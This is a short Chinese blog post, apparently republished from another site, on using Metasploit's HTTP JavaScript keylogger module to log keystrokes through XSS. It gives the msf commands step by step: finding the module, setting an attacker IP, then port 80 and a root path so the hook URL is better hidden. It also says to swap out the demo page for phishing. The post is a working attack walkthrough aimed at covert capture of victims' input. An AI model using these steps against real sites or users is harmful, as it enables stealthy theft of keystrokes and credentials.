Metasploit之玩转不一样的XSS

颓废 2019年5月19日10:07:05评论639 views字数 1084阅读3分36秒阅读模式

Metasploit之玩转不一样的XSS
参考文献:http://www.freebuf.com/articles/3549.html

这里主要是运用XSS攻击进行的键盘记录keylogger

首先我们打开metasploit,在msf中搜索下可用的keylogger模块

msf > search keylogger    -->搜索keylogger模块

得到回显三个模块

   auxiliary/server/capture/http_javascript_keylogger                   
normal  Capture: HTTP JavaScript Keylogger//正常捕获:HTTP的JavaScript程序

   post/osx/capture/keylog_recorder                                     
normal  OSX Capture Userspace Keylogger//正常的OSX捕捉用户的键盘记录程序

   post/windows/capture/lockout_keylogger                               
normal  Windows Capture Winlogon Lockout Credential Keylogger//正常的Windows凭据捕获winlogon锁定键盘记录

这里我们可以测试的是利用HTTP的JavaScript程序捕获键盘记录,XSS运用的

use auxiliary/server/capture/http_javascript_keylogger    -->使用该模块

show options                                              -->查看设置选项

set srvhost 192.168.2.146                                 -->设置我们的反弹回来的IP地址

run                                                       -->运行,得到XSS利用地址

运行后发现我们得到的地址是这样的:http://192.168.2.146:8080/qD5XRm?id=35632ed2

若为了方便隐藏,我们可以设置端口SRVPORT为80,路径URIPATH为根目录下“/”,命令如下

set srvport 80    -->设置访问端口80

set uripath /     -->设置访问路径为根目录

run               -->运行,得到地址,等待访问捕获键盘记录

得到回显地址:http://192.168.2.146:80/

PS:在设置选项中还有一个配置“demo”,就是msf本身自带的测试页面,我们在做钓鱼攻击的时候需要将这个页面替换掉就可以了

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:07:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之玩转不一样的XSShttp://cn-sec.com/archives/67373.html

发表评论

匿名网友 填写信息